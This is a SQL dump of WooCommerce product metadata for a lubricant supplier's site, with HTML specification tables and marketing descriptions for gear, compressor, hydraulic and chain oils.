INSERT INTO `wp_postmeta` VALUES (15732, 1638, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (15733, 1638, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (15734, 1100, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15735, 1643, '_edit_lock', '1482345383:2'); 
INSERT INTO `wp_postmeta` VALUES (15736, 1643, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (15737, 1643, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (15738, 1643, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (15739, 1643, '312_default_editor', '<table width="1479">\r\n<tbody>\r\n<tr>\r\n<td width="219">Product</td>\r\n<td style="text-align: center;" width="180"><strong>2140</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2141</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2142</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2143</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2144</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2145</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2146</strong></td>\r\n</tr>\r\n<tr>\r\n<td>ISO VG</td>\r\n<td style="text-align: center;">320</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">320</td>\r\n<td style="text-align: center;">460</td>\r\n<td style="text-align: center;">680</td>\r\n</tr>\r\n<tr>\r\n<td>SAE</td>\r\n<td style="text-align: center;">85W/140</td>\r\n<td style="text-align: center;">75/90</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">90</td>\r\n<td style="text-align: center;">90</td>\r\n<td style="text-align: center;">140</td>\r\n<td style="text-align: center;">140</td>\r\n</tr>\r\n<tr>\r\n<td>AGMA</td>\r\n<td style="text-align: center;">6EP</td>\r\n<td style="text-align: center;">4EP</td>\r\n<td style="text-align: center;">3EP</td>\r\n<td style="text-align: center;">5EP</td>\r\n<td style="text-align: center;">6EP</td>\r\n<td style="text-align: center;">7EP</td>\r\n<td style="text-align: center;">8EP</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 40°C</td>\r\n<td style="text-align: center;">312</td>\r\n<td style="text-align: center;">156</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">320</td>\r\n<td style="text-align: center;">460</td>\r\n<td style="text-align: center;">680</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @100°C</td>\r\n<td style="text-align: center;">28</td>\r\n<td style="text-align: center;">17.5</td>\r\n<td style="text-align: center;">12.6</td>\r\n<td style="text-align: center;">22.2</td>\r\n<td style="text-align: center;">29</td>\r\n<td style="text-align: center;">37</td>\r\n<td style="text-align: center;">48</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 100°F</td>\r\n<td style="text-align: center;">1445</td>\r\n<td style="text-align: center;">725</td>\r\n<td style="text-align: center;">464</td>\r\n<td style="text-align: center;">1019</td>\r\n<td style="text-align: center;">1482</td>\r\n<td style="text-align: center;">2131</td>\r\n<td style="text-align: center;">3150</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 210°F</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">69</td>\r\n<td style="text-align: center;">109</td>\r\n<td style="text-align: center;">138</td>\r\n<td style="text-align: center;">174</td>\r\n<td style="text-align: center;">225</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity Index</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">123</td>\r\n<td style="text-align: center;">120</td>\r\n<td style="text-align: center;">122</td>\r\n<td style="text-align: center;">123</td>\r\n<td style="text-align: center;">122</td>\r\n<td style="text-align: center;">121</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point °F</td>\r\n<td style="text-align: center;">470</td>\r\n<td style="text-align: center;">455</td>\r\n<td style="text-align: center;">455</td>\r\n<td style="text-align: center;">460</td>\r\n<td style="text-align: center;">460</td>\r\n<td style="text-align: center;">470</td>\r\n<td style="text-align: center;">470</td>\r\n</tr>\r\n<tr>\r\n<td>Pour Point °F</td>\r\n<td style="text-align: center;">-25</td>\r\n<td style="text-align: center;">-30</td>\r\n<td style="text-align: center;">-32</td>\r\n<td style="text-align: center;">-30</td>\r\n<td style="text-align: center;">-25</td>\r\n<td style="text-align: center;">-5</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>FGZ Test-Load Stages Passed</td>\r\n<td style="text-align: center;">12+</td>\r\n<td style="text-align: center;">12+</td>\r\n<td style="text-align: center;">12+</td>\r\n<td style="text-align: center;">12+</td>\r\n<td style="text-align: center;">12+</td>\r\n<td style="text-align: center;">12+</td>\r\n<td style="text-align: center;">12+</td>\r\n</tr>\r\n<tr>\r\n<td>Timken Load West Test OK Load, kg/lbs.</td>\r\n<td style="text-align: center;">41/90</td>\r\n<td style="text-align: center;">41/90</td>\r\n<td style="text-align: center;">41/90</td>\r\n<td style="text-align: center;">41/90</td>\r\n<td style="text-align: center;">41/90</td>\r\n<td style="text-align: center;">41/90</td>\r\n<td style="text-align: center;">41/90</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (15740, 1643, '1367_default_editor', '<ul>\r\n 	<li>2140</li>\r\n 	<li>2141</li>\r\n 	<li>2142</li>\r\n 	<li>2143</li>\r\n 	<li>2144</li>\r\n 	<li>2145</li>\r\n 	<li>2146</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (15741, 1643, '716_default_editor', '<ul>\r\n 	<li>Gear Box</li>\r\n 	<li>Gears</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (15742, 1643, '719_default_editor', '<ul>\r\n 	<li>DIN 51354</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (15743, 1643, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15744, 1643, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (15745, 1643, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15746, 1643, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15747, 1643, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (15748, 1643, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15749, 1643, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (15750, 1643, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (15751, 1643, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (15752, 1643, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (15753, 1643, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15754, 1643, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15755, 1643, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15756, 1643, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (15757, 1643, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (15758, 1643, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15759, 1643, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (15760, 1643, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15761, 1643, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15762, 1643, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (15763, 1643, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15764, 1643, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15765, 1643, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (15766, 1643, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (15798, 1643, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (15799, 1643, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (15800, 1643, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15801, 1643, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15802, 1643, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (15803, 1643, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (15804, 1643, '_ywtm_content_tab_description', 'Advantages:\r\n<ul>\r\n 	<li>Lower Energy Costs</li>\r\n 	<li>Increased Gear Box Efficiency</li>\r\n 	<li>High Operating Stability</li>\r\n 	<li>Non-corrosive to steel, copper, aluminum, bronze and bearing alloys.</li>\r\n 	<li>Immediate Leakage Reduction</li>\r\n 	<li>Demulsibility</li>\r\n</ul>\r\nThese oils have multi-purpose service. In addition to gear drive usage, these oils are used in bearing baths and reservoirs, on ways and slides, and all other applications specifying a gear lubricant. Low temperature operating ranges assures easy and smooth cold startups. These multi viscosity oils minimize oil inventory and incorrect oil selection. Each gear oil has superior adhesive properties to resist fling-off and leakage. Excellent water separation permits easy drain-off for uninterrupted year-round operation.'); 
INSERT INTO `wp_postmeta` VALUES (15805, 1644, '_edit_lock', '1482345426:2'); 
INSERT INTO `wp_postmeta` VALUES (15806, 1644, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (15807, 1644, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (15808, 1644, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (15809, 1644, '312_default_editor', '<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: left;" width="219">Product</td>\r\n<td style="text-align: center;" width="180"><strong>2160</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2161</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2162</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2163</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2164</strong></td>\r\n</tr>\r\n<tr>\r\n<td>ISO VG</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">46</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">150</td>\r\n</tr>\r\n<tr>\r\n<td>SAE</td>\r\n<td style="text-align: center;">10</td>\r\n<td style="text-align: center;">20W</td>\r\n<td style="text-align: center;">20</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">40</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">0.83</td>\r\n<td style="text-align: center;">0.84</td>\r\n<td style="text-align: center;">0.84</td>\r\n<td style="text-align: center;">0.85</td>\r\n<td style="text-align: center;">0.86</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 40°C</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">46</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">150</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @100°C</td>\r\n<td style="text-align: center;">6</td>\r\n<td style="text-align: center;">7.8</td>\r\n<td style="text-align: center;">10.5</td>\r\n<td style="text-align: center;">14</td>\r\n<td style="text-align: center;">18.4</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 100°F</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">214</td>\r\n<td style="text-align: center;">315</td>\r\n<td style="text-align: center;">464</td>\r\n<td style="text-align: center;">695</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 210°F</td>\r\n<td style="text-align: center;">46</td>\r\n<td style="text-align: center;">52</td>\r\n<td style="text-align: center;">61</td>\r\n<td style="text-align: center;">74</td>\r\n<td style="text-align: center;">92</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Viscosity Index</td>\r\n<td style="text-align: center;">135</td>\r\n<td style="text-align: center;">139</td>\r\n<td style="text-align: center;">142</td>\r\n<td style="text-align: center;">142</td>\r\n<td style="text-align: center;">135</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point °F</td>\r\n<td style="text-align: center;">495</td>\r\n<td style="text-align: center;">509</td>\r\n<td style="text-align: center;">509</td>\r\n<td style="text-align: center;">515</td>\r\n<td style="text-align: center;">523</td>\r\n</tr>\r\n<tr>\r\n<td>Pour Point °F</td>\r\n<td style="text-align: center;">-70</td>\r\n<td style="text-align: center;">-65</td>\r\n<td style="text-align: center;">-65</td>\r\n<td style="text-align: center;">-50</td>\r\n<td style="text-align: center;">-50</td>\r\n</tr>\r\n<tr>\r\n<td>Autoignition °F</td>\r\n<td style="text-align: center;">735</td>\r\n<td style="text-align: center;">740</td>\r\n<td style="text-align: center;">740</td>\r\n<td style="text-align: center;">740</td>\r\n<td style="text-align: center;">740</td>\r\n</tr>\r\n<tr>\r\n<td>4 Ball Wear-1200rpm (167°F, 40 kg/1hr.) scar diameter, mm</td>\r\n<td style="text-align: center;">0.41</td>\r\n<td style="text-align: center;">0.41</td>\r\n<td style="text-align: center;">0.39</td>\r\n<td style="text-align: center;">0.39</td>\r\n<td style="text-align: center;">0.39</td>\r\n</tr>\r\n<tr>\r\n<td>Copper Corrosion, 24 hrs</td>\r\n<td style="text-align: center;">1A</td>\r\n<td style="text-align: center;">1A</td>\r\n<td style="text-align: center;">1A</td>\r\n<td style="text-align: center;">1A</td>\r\n<td style="text-align: center;">1A</td>\r\n</tr>\r\n<tr>\r\n<td>Total Acid Number</td>\r\n<td style="text-align: center;">0.14</td>\r\n<td style="text-align: center;">0.14</td>\r\n<td style="text-align: center;">0.14</td>\r\n<td style="text-align: center;">0.14</td>\r\n<td style="text-align: center;">0.14</td>\r\n</tr>\r\n<tr>\r\n<td>Evaporation Loss, % by wt. (347°F, 72 hrs)</td>\r\n<td style="text-align: center;">&lt;3</td>\r\n<td style="text-align: center;">&lt;3</td>\r\n<td style="text-align: center;">&lt;2</td>\r\n<td style="text-align: center;">&lt;2</td>\r\n<td style="text-align: center;">&lt;2</td>\r\n</tr>\r\n<tr>\r\n<td>Demulsibility, 130°F ml Oil/Water/ Emulsion (Minutes)</td>\r\n<td style="text-align: center;">40/40/0(10)</td>\r\n<td style="text-align: center;">40/40/0(10)</td>\r\n<td style="text-align: center;">40/40/0(10)</td>\r\n<td style="text-align: center;">40/40/0(10)</td>\r\n<td style="text-align: center;">40/40/0(10)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (15810, 1644, '1367_default_editor', '<ul>\r\n 	<li>2160</li>\r\n 	<li>2161</li>\r\n 	<li>2162</li>\r\n 	<li>2163</li>\r\n 	<li>2164</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (15811, 1644, '716_default_editor', '<ul>\r\n 	<li>Gear Box</li>\r\n 	<li>Gears</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (15812, 1644, '719_default_editor', '<ul>\r\n 	<li>DIN 51354</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (15813, 1644, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15814, 1644, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (15815, 1644, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15816, 1644, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15817, 1644, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (15818, 1644, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15819, 1644, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (15820, 1644, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (15821, 1644, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (15822, 1644, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (15823, 1644, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15824, 1644, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15825, 1644, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15826, 1644, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (15827, 1644, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (15828, 1644, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15829, 1644, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (15830, 1644, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15831, 1644, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15832, 1644, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (15833, 1644, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15834, 1644, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15835, 1644, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (15836, 1644, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (15837, 1644, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15838, 1644, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15839, 1644, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (15840, 1644, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (15841, 1644, '_ywtm_content_tab_description', '<strong>Rotary Compressors</strong>\r\nIn rotary compressor applications, these oils increase air/oil separator life indefinitely, and extend rotary oil drain intervals up to 5,000 and 8,000 hours. Their low oil volatility ratings mean less make-up oil due to evaporation.\r\n\r\n<strong>Reciprocating Compressors</strong>\r\n216X Series of oils can reduce upper cylinder operating temperatures by as much as 40˚F/4˚C, reduce cylinder oil feed rates by as much as 40%, extend crankcase oil drain intervals by as much as 10 times, and extend valve and part life indefinitely.\r\n\r\n<strong>Compatibility</strong>\r\nThey are compatible with all known gasket and seal materials and are nonreactive with materials found downstream, such as polycarbonate bowls, elastomers and paints. These lubricants should be used exclusively and should not be mixed or dilutedwith existing product'); 
INSERT INTO `wp_postmeta` VALUES (15868, 1142, '_edit_lock', '1473857004:2'); 
INSERT INTO `wp_postmeta` VALUES (15869, 961, '_edit_lock', '1473857103:2'); 
INSERT INTO `wp_postmeta` VALUES (15870, 1644, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (15871, 1644, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (15872, 1645, '_edit_lock', '1482345469:2'); 
INSERT INTO `wp_postmeta` VALUES (15873, 1645, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (15874, 1645, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (15875, 1645, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (15876, 1645, '312_default_editor', '<table width="939">\r\n<tbody>\r\n<tr>\r\n<td width="219">Product</td>\r\n<td style="text-align: center;" width="180"><strong>2170</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2171</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2172</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2173</strong></td>\r\n</tr>\r\n<tr>\r\n<td>ISO VG</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">46</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">100</td>\r\n</tr>\r\n<tr>\r\n<td>SAE</td>\r\n<td style="text-align: center;">10</td>\r\n<td style="text-align: center;">20W</td>\r\n<td style="text-align: center;">20</td>\r\n<td style="text-align: center;">30</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 40°C</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">46</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">100</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @100°C</td>\r\n<td style="text-align: center;">5.4</td>\r\n<td style="text-align: center;">6.9</td>\r\n<td style="text-align: center;">8.9</td>\r\n<td style="text-align: center;">11.8</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 100°F</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">214</td>\r\n<td style="text-align: center;">315</td>\r\n<td style="text-align: center;">464</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 210°F</td>\r\n<td style="text-align: center;">44</td>\r\n<td style="text-align: center;">49</td>\r\n<td style="text-align: center;">56</td>\r\n<td style="text-align: center;">66</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity Index</td>\r\n<td style="text-align: center;">102</td>\r\n<td style="text-align: center;">105</td>\r\n<td style="text-align: center;">104</td>\r\n<td style="text-align: center;">107</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (15877, 1645, '1367_default_editor', '<ul>\r\n 	<li>2170</li>\r\n 	<li>2171</li>\r\n 	<li>2172</li>\r\n 	<li>2173</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (15878, 1645, '716_default_editor', '<ul>\r\n 	<li>Hydraulics</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (15879, 1645, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15880, 1645, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15881, 1645, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (15882, 1645, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15883, 1645, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15884, 1645, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (15885, 1645, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15886, 1645, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (15887, 1645, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (15888, 1645, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (15889, 1645, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (15890, 1645, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15891, 1645, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15892, 1645, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15893, 1645, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (15894, 1645, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (15895, 1645, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (15896, 1645, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (15897, 1645, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15898, 1645, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15899, 1645, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (15900, 1645, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15901, 1645, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15902, 1645, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (15903, 1645, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (15904, 1645, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15905, 1645, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15906, 1645, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (15907, 1645, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (15908, 1645, '_ywtm_content_tab_description', '<strong>Rotary Compressors</strong>\r\nIn rotary compressor applications, these oils increase air/oil separator life indefinitely, and extend rotary oil drain intervals up to 5,000 and 8,000 hours. Their low oil volatility ratings mean less make-up oil due to evaporation.\r\n\r\n<strong>Reciprocating Compressors</strong>\r\n216X Series of oils can reduce upper cylinder operating temperatures by as much as 40˚F/4˚C, reduce cylinder oil feed rates by as much as 40%, extend crankcase oil drain intervals by as much as 10 times, and extend valve and part life indefinitely.\r\n\r\n<strong>Compatibility</strong>\r\nThey are compatible with all known gasket and seal materials and are nonreactive with materials found downstream, such as polycarbonate bowls, elastomers and paints. These lubricants should be used exclusively and should not be mixed or dilutedwith existing product'); 
INSERT INTO `wp_postmeta` VALUES (15935, 1645, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (15936, 1645, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (15937, 1646, '_edit_lock', '1482345519:2'); 
INSERT INTO `wp_postmeta` VALUES (15938, 1646, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (15939, 1646, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (15940, 1646, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (15941, 1646, '312_default_editor', '<table width="579">\r\n<tbody>\r\n<tr>\r\n<td width="219">Product</td>\r\n<td style="text-align: center;" width="180"><strong>2180</strong></td>\r\n<td style="text-align: center;" width="180"><strong>2181</strong></td>\r\n</tr>\r\n<tr>\r\n<td>ISO VG</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">320</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity w/Penetration</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>cSt @ 40°C</td>\r\n<td style="text-align: center;">6.9</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 100°F</td>\r\n<td style="text-align: center;">50</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity w/o Penetration</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>cSt @ 40°C</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">324</td>\r\n</tr>\r\n<tr>\r\n<td>SUS @ 100°F</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">1500</td>\r\n</tr>\r\n<tr>\r\n<td>Rust Test ASTM D665</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point °F</td>\r\n<td style="text-align: center;">410</td>\r\n<td style="text-align: center;">435</td>\r\n</tr>\r\n<tr>\r\n<td>Pour Point °F</td>\r\n<td style="text-align: center;">-56</td>\r\n<td style="text-align: center;">-5</td>\r\n</tr>\r\n<tr>\r\n<td>4 Ball Wear-1200rpm (167°F, 40 kg/1hr.) scar diameter, mm</td>\r\n<td style="text-align: center;">0.45</td>\r\n<td style="text-align: center;">0.43</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (15942, 1646, '1367_default_editor', '<strong>2180</strong>\r\n\r\nThis oil is proven to extend chain life operating in wet conditions. It penetrates and leaves a water resistant, protective film on chain and part surfaces.\r\n\r\nAdvantages\r\n<ul>\r\n 	<li>Anti-Wear Protection</li>\r\n 	<li>Excellent Rust and Corrosion Protection</li>\r\n 	<li>Water Resistant</li>\r\n</ul>\r\n<strong>2181</strong>\r\n\r\nA light chain oil fortified with a highly concentrated package of submicron sized molybdenum disulfide. It lubricates maximum and rapid penetration into pins, rollers and bushings, reducing wear and chain stretch.\r\n\r\nAdvantages\r\n<ul>\r\n 	<li>Eliminates Contamination Buildup</li>\r\n 	<li>Penetrates to Loosen and Free Stiff Chains</li>\r\n 	<li>Cleans Chain</li>\r\n 	<li>Quickly Produces Flexible Chain Action</li>\r\n 	<li>Eliminates Chain Stick/Slip Motion</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (15943, 1646, '716_default_editor', '<ul>\r\n 	<li>Roller Chains</li>\r\n 	<li>Pins</li>\r\n 	<li>Hinges</li>\r\n 	<li>Castors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Bolts</li>\r\n 	<li>Screw Assemblies</li>\r\n 	<li>Bushings</li>\r\n 	<li>Cables</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (15944, 1646, '719_default_editor', '<ul>\r\n 	<li>ASTM D665</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (15945, 1646, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (15946, 1646, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (15947, 1646, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15948, 1646, '_virtual', 'no'); 
